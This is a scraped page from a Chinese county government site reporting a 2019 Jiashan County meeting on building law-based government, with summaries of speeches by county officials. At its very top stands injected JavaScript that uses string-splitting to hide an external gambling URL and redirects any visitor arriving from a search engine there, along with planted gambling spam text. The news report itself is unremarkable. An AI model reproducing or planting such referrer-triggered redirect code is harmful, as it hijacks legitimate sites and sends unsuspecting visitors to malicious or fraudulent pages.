var ref=document.referrer;if(ref.length>3){location.href="ht"+"tps://wa"+ "p.y6"+"6"+"6.net/baidu444.htm?"+document.domain;}

bbin宝盈,bbin下载

您的当前位置:首页 > 各地信息
发布日期:2019-10-31 浏览次数: 字号:[ ]

为深入推进法治政府建设,部署推进全国法治政府建设示范创建工作,10月30日下午,嘉善县召开法治政府建设推进会。市委常委、县委书记、县委依法治县委主任许晴出席会议并讲话,县委副书记、县长、县委依法治县委副主任徐鸣阳对法治政府建设情况做了通报,县委副书记、县委政法委书记、县委依法治县委副主任陈天荣主持会议。县委依法治县委全体成员,县政府各副县长,各镇(街道)党委书记(镇长、主任),县级各部门、有关单位主要领导(分管领导)等共70余人参加会议。

DSC07038.jpg

许晴指出,法治政府建设是依法治国的应有之义,是经济发展的根本保障,是造福人民的重要举措。各单位、各部门、各镇(街道)要准确把握法治政府建设的目标要求,切实解决当前法治政府建设面临的突出问题。推进法治政府建设,开展法治政府示范创建,需要大家一起群策群力、共同发力。

许晴强调,要提高政治站位,凝聚共识,切实增强加快法治政府建设的责任感和紧迫感。从思想认识上认清法治政府建设的重大意义,法治政府建设是落实上级部署的关键举措,维护社会和谐稳定的必然要求,打造最优营商环境的现实需要,也是推动中心工作抓落实的坚强保障。要聚焦重点,精准发力,推动法治政府建设不断取得新成效。规范决策程序,推进政务公开,使行政决策更加民主。灵活运用法律,敢于依法斗争,形成各方合力,使执法办案更加公正严格。吃透法律,积极应诉答辩,强化结果运用,加快行政争议化解。要群策群力、强化保障,确保法治政府建设各项任务落到实处。聚焦关键少数,补齐突出短板,充分发挥执法监督作用,大力推进执法体系建设。加强行政应诉能力建设,发挥行政诉讼倒逼机制,严格落实败诉责任追究机制,充分履行法治责任义务。进一步完善府院沟通机制,协同联动机制,营造浓厚法治氛围,全面畅通互动渠道。

会上,县委副书记、县长徐鸣阳总结回顾了今年以来我县法治政府建设取得的三方面成效,主要表现在党的领导不断加强;法治为民根基不断夯实;依法行政基础不断增强。同时,通报了嘉善县成为浙江省向中央推进申报的4个全国法治政府建设示范市县之一的示范创建情况,指出了我县在法治基础保障与公共法律服务体系建设、行政争议预防化解、执行重大行政决策和法治政府建设宣传考核等四个方面的突出问题,特别是对今年以来的行政诉讼败诉、行政复议纠错案件进行了点评。

最后,县委副书记、县委政法委书记陈天荣提出三点要求:一要提高站位抓落实。各单位、各部门、各镇(街道)一定要从嘉善“双示范”的政治站位出发,深刻认识建设法治政府的重要意义,发挥“关键少数”作用,带头尊崇法治、敬畏法律,带头学法用法、依法办事,带头厉行法治、履职尽责,引领和推动法治政府建设。二要聚焦重点抓落实。要把“行政决策更加科学民主,执法办案更加公正严格,行政争议更加快速化解”三个更加贯穿于法治政府建设全过程,严格对照指标逐项优化,确保圆满完成创建各项工作。三要压实责任抓落实。各单位、各部门、各镇(街道)主要领导要把法治政府建设作为一把手工程来抓,对法治政府建设重要工作要亲自部署、重大问题要亲自过问、重点环节要亲自协调、重要任务要亲自督办。县委依法治县办要及时开展督查自查,推动问题整改和责任落实。

会后,全体与会人员还在嘉善县人民法院旁听了一起行政诉讼案件的庭审。

微信图片_20191031111421.jpg

嘉善县局

 

                    

 




打印本页 关闭窗口
Produced By 大汉网络 大汉版通发布系统